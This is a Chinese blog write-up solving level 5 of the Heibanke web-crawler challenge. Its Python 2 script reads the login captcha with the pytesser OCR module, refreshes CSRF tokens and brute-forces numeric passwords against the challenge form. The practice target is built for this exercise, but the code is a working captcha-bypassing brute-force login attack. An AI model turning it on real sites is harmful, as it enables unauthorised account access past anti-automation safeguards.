黑板客 -- 爬虫闯关 -- 关卡05
简介
爬虫闯关链接:
**1. ** http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/
**2. ** http://www.heibanke.com/lesson/crawler_ex04/
**3. ** http://www.heibanke.com
知识点:cookie & session , csrf , Web编程,验证码识别模块
提示:本题相较之于前4题的难度在于验证码识别问题,为了方便起见,就用了网络上现成的pytesser模块,PIL模块64位Python安装时可能会遇到一点小麻烦,尽量使用32位Python。
pytesser模块安装及使用参考资料:
**1. ** http://blog.csdn.net/evankaka/article/details/49533493
**2. ** http://blog.csdn.net/tianxiawuzhei/article/details/44922843
**3. ** http://blog.csdn.net/bigzhao_25/article/details/52350781
参考代码
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import re
import threading
from pytesser import *
reload(sys)
sys.setdefaultencoding("utf-8")
csrf = ""
username = "Peter"
password = "112233"
captcha_0 = ""
captcha_1 = ""
attack_password = ""
website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/"
website_attack = "http://www.heibanke.com/lesson/crawler_ex04/"
website_imageBase = "http://www.heibanke.com"
payload_login = {
"username":username,
"password":password,
"csrfmiddlewaretoken":csrf
}
payload_attack = {
"username":username,
"password":attack_password,
"csrfmiddlewaretoken":csrf,
"captcha_0":captcha_0,
"captcha_1":captcha_1
}
s = requests.Session()
s.get(website_login)
csrf = payload_login["csrfmiddlewaretoken"] = payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
def Test_verCode(image_path):
image = Image.open(image_path)
verCode_res = image_to_string(image)
return verCode_res
def getVerCode(resp):
global payload_attack
word_captcha_1 = re.findall('<img src="(.*?)" alt="captcha" class="captcha" />', resp.content)
word_captcha_0 = re.findall('<input id="id_captcha_0" name="captcha_0" type="hidden" value="(.*?)" />', resp.content)
payload_attack["captcha_0"] = word_captcha_0[0]
Image_URL = website_imageBase+word_captcha_1[0]
return Image_URL
def downloadImage(Image_URL):
try:
pic= requests.get(Image_URL, timeout=10)
except requests.exceptions.ConnectionError:
print '[-] Image can not download '
string = '1' + '.png'
fp = open(string,'wb')
fp.write(pic.content)
fp.close()
def get_attackResp(verCode_res,attack_password,s):
global payload_attack
payload_attack["password"] = attack_password
payload_attack["captcha_1"] = verCode_res[0:4:1]
resp_attack = s.post(website_attack,data=payload_attack)
payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
return resp_attack
def main():
global payload_login
global payload_attack
global s
resp_login = s.post(website_login,data=payload_login)
payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
image_URL = getVerCode(resp_login)
downloadImage(image_URL)
verCode_res = Test_verCode('1.png')
for i in range(31):
resp_attack = get_attackResp(verCode_res,str(i),s)
while True:
if resp_attack.content.find(u'验证码输入错误'.decode('utf8')) == -1:
break
else:
print "[-]VerCode ERROR: PW:" + payload_attack["password"] + " -- VERCODE:" + verCode_res
resp_login = s.post(website_login,data=payload_login)
payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
image_URL = getVerCode(resp_login)
downloadImage(image_URL)
verCode_res = Test_verCode('1.png')
resp_attack = get_attackResp(verCode_res,str(i),s)
continue
if resp_attack.content.find(u'错误'.decode('utf8')) == -1:
print "[+]FOUND PASSWORD:" + payload_attack["password"]
print "\nTEXT:\n" + unicode(resp_attack.content).decode('utf8')
break
if __name__ == '__main__':
main()
本文为博主总结文章,欢迎转载,请注明出处。